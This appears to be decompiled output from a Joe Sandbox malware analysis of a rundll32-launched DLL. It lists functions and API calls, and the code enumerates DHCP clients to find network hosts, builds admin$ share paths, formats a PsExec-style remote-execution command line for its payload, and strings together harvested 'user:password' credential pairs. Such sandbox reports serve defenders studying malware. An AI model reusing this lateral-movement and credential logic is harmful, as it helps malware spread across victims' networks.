    							__imp__DhcpRpcFreeMemory(_v16);
    							goto L13;
    						} else {
    							do {
    								_t89 =  *((intOrPtr*)( *((intOrPtr*)(_v16 + 4)) + _t88 * 4));
    								if(_t89 != 0) {
    									_push( *_t89);
    									_t85 = __imp__#14;
    									if(E011EA3D9( *_t85()) != 0) {
    										__imp__#12( *_t85( *_t89));
    										_t86 = E011E6916(_t78);
    										if(_t86 != 0) {
    											E011E6FC7(_t79, 0, _a4);
    											HeapFree(GetProcessHeap(), 0, _t86);
    										}
    									}
    								}
    								_t88 = _v24 + 1;
    								_v24 = _t88;
    							} while (_t88 < _v52);
    							goto L12;
    						}
    					}
    					L13:
    					_t83 = _v28 + 1;
    					_v28 = _t83;
    				} while (_t83 < _v60);
    				goto L14;
    			}

    0x011e90a3
    0x011e90a5
    0x011e90a9
    0x011e90ac
    0x011e90af
    0x011e90b2
    0x011e90b5
    0x011e90b8
    0x011e90bb
    0x011e90be
    0x011e90c1
    0x011e90c4
    0x011e90c7
    0x011e90ca
    0x011e90d1
    0x011e90ec
    0x011e90f3
    0x011e90fb
    0x011e91f3
    0x011e91f7
    0x011e91f7
    0x011e9104
    0x011e9106
    0x011e910b
    0x011e91e8
    0x011e91eb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e9111
    0x011e9111
    0x011e9118
    0x011e911f
    0x011e9127
    0x011e9151
    0x011e9158
    0x011e9160
    0x00000000
    0x00000000
    0x011e9165
    0x011e9167
    0x011e916c
    0x011e91cf
    0x011e91d2
    0x00000000
    0x011e9172
    0x011e9172
    0x011e9178
    0x011e917d
    0x011e917f
    0x011e9181
    0x011e9191
    0x011e9198
    0x011e91a4
    0x011e91a8
    0x011e91af
    0x011e91bd
    0x011e91bd
    0x011e91a8
    0x011e9191
    0x011e91c6
    0x011e91c7
    0x011e91ca
    0x00000000
    0x011e9172
    0x011e916c
    0x011e91d8
    0x011e91db
    0x011e91dc
    0x011e91df
    0x00000000

    APIs
    • GetComputerNameExW.KERNEL32(00000004,?,?,00000000,73389263,00000000), ref: 011E90D1
    • DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 011E90F3
    • DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 011E911F
    • DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 011E9158
    • htonl.WS2_32(00000000), ref: 011E9187
    • htonl.WS2_32(00000000), ref: 011E9195
    • inet_ntoa.WS2_32(00000000), ref: 011E9198
      • Part of subcall function 011E6916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,00000000,00000000,769E2D57,?,011E91A4,00000000), ref: 011E6935
      • Part of subcall function 011E6916: GetProcessHeap.KERNEL32(00000000,00000000,?,011E91A4,00000000), ref: 011E6942
      • Part of subcall function 011E6916: HeapAlloc.KERNEL32(00000000,?,011E91A4,00000000), ref: 011E6949
      • Part of subcall function 011E6916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,?,011E91A4,00000000), ref: 011E6961
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 011E91B6
    • HeapFree.KERNEL32(00000000), ref: 011E91BD
    • DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 011E91D2
    • DhcpRpcFreeMemory.DHCPSAPI(?), ref: 011E91EB
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E6CE7(void* _a4, void* _a8) {
    				signed int _v8;
    				intOrPtr _v12;
    				void* _v16;
    				void* _v20;
    				void* __ebx;
    				intOrPtr _t32;
    				intOrPtr* _t33;
    				void* _t38;
    				intOrPtr* _t40;
    				intOrPtr* _t45;
    				void* _t50;
    				intOrPtr* _t53;
    				void* _t67;
    				intOrPtr _t68;
    				void* _t69;
    				intOrPtr _t70;
    				intOrPtr _t71;
    				void* _t72;
    				intOrPtr _t73;
    				void* _t74;
    
    				_t32 =  *0x11ff108; // 0x2e6710
    				_v8 = _v8 & 0x00000000;
    				_v12 = _t32;
    				_t33 = _a4;
    				_t67 = _t33 + 2;
    				do {
    					_t71 =  *_t33;
    					_t33 = _t33 + 2;
    				} while (_t71 != 0);
    				_t38 = HeapAlloc(GetProcessHeap(), 8, (_t33 - _t67 >> 1) + (_t33 - _t67 >> 1) + 2);
    				_v20 = _t38;
    				if(_t38 != 0) {
    					_t40 = _a4;
    					_t72 = _t40 + 2;
    					do {
    						_t68 =  *_t40;
    						_t40 = _t40 + 2;
    					} while (_t68 != 0);
    					memcpy(_v20, _a4, (_t40 - _t72 >> 1) + (_t40 - _t72 >> 1) + 2);
    					_t45 = _a8;
    					_t69 = _t45 + 2;
    					do {
    						_t73 =  *_t45;
    						_t45 = _t45 + 2;
    					} while (_t73 != 0);
    					_t50 = HeapAlloc(GetProcessHeap(), 8, (_t45 - _t69 >> 1) + (_t45 - _t69 >> 1) + 2);
    					_v16 = _t50;
    					if(_t50 != 0) {
    						_t53 = _a8;
    						_t74 = _t53 + 2;
    						do {
    							_t70 =  *_t53;
    							_t53 = _t53 + 2;
    						} while (_t70 != 0);
    						memcpy(_v16, _a8, (_t53 - _t74 >> 1) + (_t53 - _t74 >> 1) + 2);
    						_v8 = E011E724D(_v12, 0, _t70,  &_v20);
    						HeapFree(GetProcessHeap(), 0, _v16);
    					}
    					HeapFree(GetProcessHeap(), 0, _v20);
    				}
    				return _v8;
    			}

    0x011e6ced
    0x011e6cf2
    0x011e6cf6
    0x011e6cf9
    0x011e6cfc
    0x011e6cff
    0x011e6cff
    0x011e6d02
    0x011e6d05
    0x011e6d26
    0x011e6d28
    0x011e6d2d
    0x011e6d33
    0x011e6d36
    0x011e6d39
    0x011e6d39
    0x011e6d3c
    0x011e6d3f
    0x011e6d53
    0x011e6d58
    0x011e6d5e
    0x011e6d61
    0x011e6d61
    0x011e6d64
    0x011e6d67
    0x011e6d7b
    0x011e6d83
    0x011e6d88
    0x011e6d8a
    0x011e6d8d
    0x011e6d90
    0x011e6d90
    0x011e6d93
    0x011e6d96
    0x011e6daa
    0x011e6dc3
    0x011e6dca
    0x011e6dca
    0x011e6dd4
    0x011e6dd6
    0x011e6ddd

    APIs
    • GetProcessHeap.KERNEL32(00000008,?,767C423D,00000000,?,?,?), ref: 011E6D1D
    • HeapAlloc.KERNEL32(00000000), ref: 011E6D26
    • memcpy.MSVCRT ref: 011E6D53
    • GetProcessHeap.KERNEL32(00000008,?,\\%ws\admin$\%ws), ref: 011E6D78
    • HeapAlloc.KERNEL32(00000000), ref: 011E6D7B
    • memcpy.MSVCRT ref: 011E6DAA
      • Part of subcall function 011E724D: EnterCriticalSection.KERNEL32(?,76E6C570,76E6FE8D,?,?,011E6DC0,?), ref: 011E725C
      • Part of subcall function 011E724D: LeaveCriticalSection.KERNEL32(?,011E6DC0,?,?,?,011E6DC0,?), ref: 011E728A
    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 011E6DC7
    • HeapFree.KERNEL32(00000000), ref: 011E6DCA
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011E6DD1
    • HeapFree.KERNEL32(00000000), ref: 011E6DD4
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E97A5(WCHAR* __ebx, WCHAR* __ecx, void* __eflags, intOrPtr _a4) {
    				signed int _v8;
    				signed int _v12;
    				char _v532;
    				void _v16916;
    				signed short* _t26;
    				void* _t36;
    				WCHAR* _t41;
    				void* _t43;
    				signed short* _t44;
    				signed int _t47;
    				signed short _t48;
    				void* _t50;
    				signed int _t52;
    				signed int _t54;
    				signed int _t55;
    				signed short* _t56;
    				WCHAR* _t57;
    
    				_t41 = __ebx;
    				E011EA4F0(0x4210);
    				_t57 = __ecx;
    				 *__ebx = 0;
    				 *((short*)(__ecx)) = 0;
    				_t52 = 0;
    				_v12 = 0;
    				E011E8B70( &_v532);
    				_t26 =  *0x11ff100; // 0x1442a10
    				_v8 = _v8 & 0;
    				if(_t26 == 0) {
    					_v8 = 3;
    				} else {
    					_t44 = _t26;
    					_t5 =  &(_t44[1]); // 0x1442a12
    					_t56 = _t5;
    					do {
    						_t48 =  *_t44;
    						_t44 =  &(_t44[1]);
    					} while (_t48 != 0);
    					_t52 = _t44 - _t56 >> 1;
    					if(_t52 > 0x104) {
    						_v8 = 0x7a;
    					} else {
    						_t50 = _t57 - _t26;
    						do {
    							_t47 =  *_t26 & 0x0000ffff;
    							 *(_t50 + _t26) = _t47;
    							_t26 =  &(_t26[1]);
    						} while (_t47 != 0);
    					}
    				}
    				SetLastError(_v8);
    				if(_t52 == 0 || PathFileExistsW(_t57) == 0) {
    					 *_t41 = 0;
    					 *_t57 = 0;
    				} else {
    					_t54 = wsprintfW(_t41, L"%s \\\\%s -accepteula -s ", _t57, _a4);
    					_t55 = _t54 + wsprintfW( &(_t41[_t54]), L"-d C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1 ",  &_v532);
    					_t15 = E011E6BB0( &_v16916) + 1; // 0x1
    					_t43 = _t15;
    					_t36 = 0x1fff;
    					if(_t43 <= 0x1fff) {
    						_t36 = _t43;
    					}
    					memcpy( &(_t41[_t55]),  &_v16916, _t36 + _t36);
    					_v12 = 1;
    				}
    				return _v12;
    			}

    0x011e97a5
    0x011e97ad
    0x011e97b5
    0x011e97b7
    0x011e97bb
    0x011e97c4
    0x011e97c7
    0x011e97ca
    0x011e97cf
    0x011e97d4
    0x011e97d9
    0x011e9817
    0x011e97db
    0x011e97db
    0x011e97dd
    0x011e97dd
    0x011e97e0
    0x011e97e0
    0x011e97e3
    0x011e97e6
    0x011e97ef
    0x011e97f7
    0x011e980e
    0x011e97f9
    0x011e97fb
    0x011e97fd
    0x011e97fd
    0x011e9800
    0x011e9804
    0x011e9807
    0x011e980c
    0x011e97f7
    0x011e9821
    0x011e9829
    0x011e989c
    0x011e989f
    0x011e9836
    0x011e9848
    0x011e985c
    0x011e986d
    0x011e986d
    0x011e9870
    0x011e9877
    0x011e9879
    0x011e9879
    0x011e9889
    0x011e9891
    0x011e9891
    0x011e98a8

    APIs
      • Part of subcall function 011E8B70: PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E8B80
    • SetLastError.KERNEL32(00000003,?,00000001,767C423D,?,011E9BEB,?), ref: 011E9821
    • PathFileExistsW.SHLWAPI ref: 011E982C
    • wsprintfW.USER32 ref: 011E9846
    • wsprintfW.USER32 ref: 011E985A
      • Part of subcall function 011E6BB0: wsprintfW.USER32 ref: 011E6BD3
      • Part of subcall function 011E6BB0: EnterCriticalSection.KERNEL32(011FF124,00000000,00000114,76E6C426), ref: 011E6BFE
      • Part of subcall function 011E6BB0: StrCatW.SHLWAPI(?,?), ref: 011E6C4C
      • Part of subcall function 011E6BB0: StrCatW.SHLWAPI(?,011FB110), ref: 011E6C52
      • Part of subcall function 011E6BB0: SetLastError.KERNEL32(0000007A), ref: 011E6C5A
      • Part of subcall function 011E6BB0: LeaveCriticalSection.KERNEL32(011FF124), ref: 011E6C65
    • memcpy.MSVCRT ref: 011E9889
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 95%
    			E011E7298(void* __ecx, struct _CRITICAL_SECTION* _a4, void* _a8, intOrPtr _a12) {
    				intOrPtr _v8;
    				void* __esi;
    				void* _t51;
    				void* _t54;
    				void* _t56;
    				signed int _t57;
    				void* _t72;
    				struct _CRITICAL_SECTION* _t82;
    
    				_t67 = __ecx;
    				_push(__ecx);
    				_t82 = _a4;
    				_v8 = 0;
    				if(_t82 == 0 || _a8 == 0) {
    					L11:
    					return _v8;
    				} else {
    					EnterCriticalSection(_t82);
    					if(E011E71D6(0, _t67, _t82, _a8, 0) == 0) {
    						_t68 =  *(_t82 + 0x20);
    						if( *(_t82 + 0x24) >=  *(_t82 + 0x20)) {
    							_t51 = HeapReAlloc(GetProcessHeap(), 8,  *(_t82 + 0x18), 0x3fc +  *(_t82 + 0x20) * 4);
    							if(_t51 != 0) {
    								 *(_t82 + 0x18) = _t51;
    								 *(_t82 + 0x20) =  *(_t82 + 0x20) + 0xff;
    								_v8 = E011E7298(_t68, _t82, _a8, _a12);
    							}
    						} else {
    							_t54 = HeapAlloc(GetProcessHeap(), 8, 8);
    							 *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4) = _t54;
    							if(_t54 != 0) {
    								_t56 = HeapAlloc(GetProcessHeap(), 8,  *(_t82 + 0x1c));
    								 *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)) = _t56;
    								_t57 =  *(_t82 + 0x24);
    								_t72 =  *(_t82 + 0x18);
    								if(_t56 == 0) {
    									HeapFree(GetProcessHeap(), 0,  *(_t72 + _t57 * 4));
    								} else {
    									 *((intOrPtr*)( *(_t72 + _t57 * 4) + 4)) = _a12;
    									memcpy( *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)), _a8,  *(_t82 + 0x1c));
    									 *(_t82 + 0x24) =  *(_t82 + 0x24) + 1;
    									_v8 = 1;
    								}
    							}
    						}
    					}
    					LeaveCriticalSection(_t82);
    					goto L11;
    				}
    			}

    0x011e7298
    0x011e729b
    0x011e729d
    0x011e72a3
    0x011e72a8
    0x011e73a5
    0x011e73ab
    0x011e72b7
    0x011e72b9
    0x011e72cc
    0x011e72d5
    0x011e72da
    0x011e737a
    0x011e7382
    0x011e7387
    0x011e738d
    0x011e739a
    0x011e739a
    0x011e72e0
    0x011e72f3
    0x011e72fb
    0x011e7300
    0x011e730e
    0x011e7319
    0x011e731d
    0x011e7320
    0x011e7323
    0x011e735b
    0x011e7325
    0x011e732b
    0x011e733f
    0x011e7347
    0x011e734a
    0x011e734a
    0x011e7323
    0x011e7300
    0x011e72da
    0x011e739e
    0x00000000
    0x011e73a4

    APIs
    • EnterCriticalSection.KERNEL32(?,00000000,00000000,00000000,-00000002,?,011E6FFB,00000001,?,00000000), ref: 011E72B9
      • Part of subcall function 011E71D6: EnterCriticalSection.KERNEL32(?,00000000,00000000,?,?,011E72CA,00000001,00000000,?,011E6FFB,00000001,?), ref: 011E71E7
      • Part of subcall function 011E71D6: LeaveCriticalSection.KERNEL32(?,?,?,011E72CA,00000001,00000000,?,011E6FFB,00000001,?), ref: 011E723E
    • GetProcessHeap.KERNEL32(00000008,?,?,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E7373
    • HeapReAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E737A
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,00000008,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E72EA
      • Part of subcall function 011E7298: HeapAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E72F3
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,?,?,011E6FFB,00000001,?,00000000), ref: 011E730B
      • Part of subcall function 011E7298: HeapAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E730E
      • Part of subcall function 011E7298: memcpy.MSVCRT ref: 011E733F
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000000,?,?,011E6FFB,00000001,?,00000000), ref: 011E7358
      • Part of subcall function 011E7298: HeapFree.KERNEL32(00000000,?,011E6FFB), ref: 011E735B
    • LeaveCriticalSection.KERNEL32(?,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E739E
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E6DE0(void* _a4, void* _a8, intOrPtr _a12) {
    				signed int _v8;
    				void* _v12;
    				void* _v16;
    				intOrPtr* _t31;
    				void* _t36;
    				intOrPtr* _t38;
    				intOrPtr* _t43;
    				void* _t48;
    				intOrPtr* _t51;
    				long _t57;
    				intOrPtr _t61;
    				void* _t63;
    				intOrPtr _t64;
    				void* _t65;
    				intOrPtr _t66;
    				intOrPtr _t67;
    				void* _t68;
    				intOrPtr _t69;
    				void* _t70;
    
    				_t31 = _a4;
    				_v8 = _v8 & 0x00000000;
    				_t61 =  *0x11ff108; // 0x2e6710
    				_t63 = _t31 + 2;
    				do {
    					_t67 =  *_t31;
    					_t31 = _t31 + 2;
    				} while (_t67 != 0);
    				_t36 = HeapAlloc(GetProcessHeap(), 8, (_t31 - _t63 >> 1) + (_t31 - _t63 >> 1) + 2);
    				_v16 = _t36;
    				if(_t36 != 0) {
    					_t38 = _a4;
    					_t68 = _t38 + 2;
    					do {
    						_t64 =  *_t38;
    						_t38 = _t38 + 2;
    					} while (_t64 != 0);
    					memcpy(_v16, _a4, (_t38 - _t68 >> 1) + (_t38 - _t68 >> 1) + 2);
    					_t43 = _a8;
    					_t65 = _t43 + 2;
    					do {
    						_t69 =  *_t43;
    						_t43 = _t43 + 2;
    					} while (_t69 != 0);
    					_t48 = HeapAlloc(GetProcessHeap(), 8, (_t43 - _t65 >> 1) + (_t43 - _t65 >> 1) + 2);
    					_v12 = _t48;
    					if(_t48 == 0) {
    						L12:
    						HeapFree(GetProcessHeap(), 0, _v16);
    					} else {
    						_t51 = _a8;
    						_t70 = _t51 + 2;
    						do {
    							_t66 =  *_t51;
    							_t51 = _t51 + 2;
    						} while (_t66 != 0);
    						memcpy(_v12, _a8, (_t51 - _t70 >> 1) + (_t51 - _t70 >> 1) + 2);
    						_t57 = E011E7298(_t66, _t61,  &_v16, _a12);
    						_v8 = _t57;
    						if(_t57 == 0) {
    							HeapFree(GetProcessHeap(), _t57, _v12);
    							goto L12;
    						}
    					}
    				}
    				return _v8;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00000001), ref: 011E6E15
    • HeapAlloc.KERNEL32(00000000), ref: 011E6E1E
    • memcpy.MSVCRT ref: 011E6E4B
    • GetProcessHeap.KERNEL32(00000008,?), ref: 011E6E6F
    • HeapAlloc.KERNEL32(00000000), ref: 011E6E72
    • memcpy.MSVCRT ref: 011E6EA1
      • Part of subcall function 011E7298: EnterCriticalSection.KERNEL32(?,00000000,00000000,00000000,-00000002,?,011E6FFB,00000001,?,00000000), ref: 011E72B9
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,00000008,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E72EA
      • Part of subcall function 011E7298: HeapAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E72F3
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,?,?,011E6FFB,00000001,?,00000000), ref: 011E730B
      • Part of subcall function 011E7298: HeapAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E730E
      • Part of subcall function 011E7298: memcpy.MSVCRT ref: 011E733F
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000000,?,?,011E6FFB,00000001,?,00000000), ref: 011E7358
      • Part of subcall function 011E7298: HeapFree.KERNEL32(00000000,?,011E6FFB), ref: 011E735B
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,?,?,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E7373
      • Part of subcall function 011E7298: HeapReAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E737A
      • Part of subcall function 011E7298: LeaveCriticalSection.KERNEL32(?,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E739E
    • GetProcessHeap.KERNEL32(00000000,?,002E6710,?,?), ref: 011E6EC1
    • HeapFree.KERNEL32(00000000), ref: 011E6EC4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011E6ECB
    • HeapFree.KERNEL32(00000000), ref: 011E6ECE
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E6BB0(WCHAR* _a4) {
    				short _v2052;
    				void* _t9;
    				intOrPtr* _t12;
    				WCHAR* _t15;
    				WCHAR* _t19;
    				intOrPtr _t26;
    				short _t27;
    				void* _t30;
    				short* _t31;
    				signed int _t33;
    				signed int _t36;
    
    				_t9 = E011E6973();
    				if(_t9 < 0xa) {
    					_t9 = 0xa;
    				}
    				wsprintfW( &_v2052, L"%d", _t9);
    				_t12 =  &_v2052;
    				_t30 = _t12 + 2;
    				do {
    					_t26 =  *_t12;
    					_t12 = _t12 + 2;
    				} while (_t26 != 0);
    				_t36 = _t12 - _t30 >> 1;
    				EnterCriticalSection(0x11ff124);
    				_t43 =  *0x11f6010;
    				if( *0x11f6010 != 0) {
    					E011E6AF0(_t43);
    				}
    				_t15 = 0x11fb110;
    				_t4 =  &(_t15[1]); // 0x11fb112
    				_t31 = _t4;
    				do {
    					_t27 =  *_t15;
    					_t15 =  &(_t15[1]);
    				} while (_t27 != 0);
    				_t33 = (_t15 - _t31 >> 1) + _t36;
    				if(_t33 >= 0x1ffe) {
    					SetLastError(0x7a);
    				} else {
    					_t19 = _a4;
    					 *_t19 = 0;
    					StrCatW(_t19,  &_v2052);
    					StrCatW(_a4, 0x11fb110);
    					_t36 = _t33;
    				}
    				LeaveCriticalSection(0x11ff124);
    				return _t36;
    			}

    APIs
      • Part of subcall function 011E6973: GetTickCount.KERNEL32(011E84FC), ref: 011E6973
    • wsprintfW.USER32 ref: 011E6BD3
    • EnterCriticalSection.KERNEL32(011FF124,00000000,00000114,76E6C426), ref: 011E6BFE
    • LeaveCriticalSection.KERNEL32(011FF124), ref: 011E6C65
      • Part of subcall function 011E6AF0: wsprintfW.USER32 ref: 011E6B36
      • Part of subcall function 011E6AF0: StrCatW.SHLWAPI(011FB110,?), ref: 011E6B6E
      • Part of subcall function 011E6AF0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E6B90
      • Part of subcall function 011E6AF0: HeapFree.KERNEL32(00000000), ref: 011E6B97
    • StrCatW.SHLWAPI(?,?), ref: 011E6C4C
    • StrCatW.SHLWAPI(?,011FB110), ref: 011E6C52
    • SetLastError.KERNEL32(0000007A), ref: 011E6C5A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E6AF0(void* __eflags) {
    				signed int _v8;
    				short _v2056;
    				void* __ebx;
    				void* __esi;
    				intOrPtr* _t21;
    				void* _t30;
    				void* _t31;
    				intOrPtr _t32;
    				signed int _t33;
    				signed int _t35;
    				intOrPtr _t36;
    				void* _t37;
    
    				 *0x11fb110 = 0;
    				_t33 = 0;
    				_v8 = 0;
    				_t30 = E011E711F(1,  &_v8);
    				if(_t30 != 0) {
    					do {
    						wsprintfW( &_v2056, L" \"%ws:%ws\"",  *((intOrPtr*)( *_v8)),  *((intOrPtr*)( *_v8 + 4)));
    						_t21 =  &_v2056;
    						_t37 = _t37 + 0x10;
    						_t31 = _t21 + 2;
    						do {
    							_t32 =  *_t21;
    							_t21 = _t21 + 2;
    						} while (_t32 != 0);
    						_t35 = (_t21 - _t31 >> 1) + _t33;
    						if(_t35 < 0x1ff5) {
    							goto L4;
    						}
    						break;
    						L4:
    						StrCatW(0x11fb110,  &_v2056);
    						_v8 = _v8 & 0x00000000;
    						_t33 = _t35;
    						_t36 =  *0x11ff108; // 0x2e6710
    					} while (E011E7167(_t30, _t36,  &_v8) != 0);
    					HeapFree(GetProcessHeap(), 0, _t30);
    				}
    				 *0x11f6010 =  *0x11f6010 & 0;
    				 *0x11ff0f8 = 0;
    				return 0;
    			}

    APIs
      • Part of subcall function 011E711F: GetProcessHeap.KERNEL32(00000008,00000008,00000000,76E6C426,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E712E
      • Part of subcall function 011E711F: HeapAlloc.KERNEL32(00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7131
      • Part of subcall function 011E711F: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7156
      • Part of subcall function 011E711F: HeapFree.KERNEL32(00000000,?,011E6B1A), ref: 011E7159
    • wsprintfW.USER32 ref: 011E6B36
    • StrCatW.SHLWAPI(011FB110,?), ref: 011E6B6E
      • Part of subcall function 011E7167: EnterCriticalSection.KERNEL32(002E6710,76E6FE8D,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7178
      • Part of subcall function 011E7167: LeaveCriticalSection.KERNEL32(002E6710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71B1
      • Part of subcall function 011E7167: Sleep.KERNELBASE(00002710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71C9
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E6B90
    • HeapFree.KERNEL32(00000000), ref: 011E6B97
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 86%
    			E011E7003(void* __ecx, void* __esi) {
    				signed int _v8;
    				void* _t23;
    				intOrPtr* _t30;
    				intOrPtr* _t32;
    				intOrPtr* _t47;
    				void* _t52;
    
    				_t52 = __esi;
    				if(__esi != 0) {
    					if( *((intOrPtr*)(__esi + 0x18)) == 0) {
    						L11:
    						return HeapFree(GetProcessHeap(), 0, _t52);
    					}
    					_v8 = _v8 & 0x00000000;
    					if( *((intOrPtr*)(__esi + 0x24)) == 0) {
    						L10:
    						HeapFree(GetProcessHeap(), 0,  *(_t52 + 0x18));
    						goto L11;
    					} else {
    						goto L3;
    					}
    					do {
    						L3:
    						_t30 =  *(_t52 + 0x18) + _v8 * 4;
    						if( *_t30 != 0) {
    							_t32 =  *_t30;
    							if( *_t32 != 0) {
    								_t47 =  *((intOrPtr*)(_t52 + 0x30));
    								if(_t47 != 0) {
    									 *_t47( *_t32);
    								}
    								HeapFree(GetProcessHeap(), 0,  *( *( *(_t52 + 0x18) + _v8 * 4)));
    							}
    							HeapFree(GetProcessHeap(), 0,  *( *(_t52 + 0x18) + _v8 * 4));
    						}
    						_v8 = _v8 + 1;
    					} while (_v8 <  *((intOrPtr*)(_t52 + 0x24)));
    					goto L10;
    				}
    				return _t23;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000,?,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E705B
    • HeapFree.KERNEL32(00000000), ref: 011E705E
    • GetProcessHeap.KERNEL32(00000000,?,76E6FE8D,774229EE,?,?,011E70EF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E706B
    • HeapFree.KERNEL32(00000000), ref: 011E706E
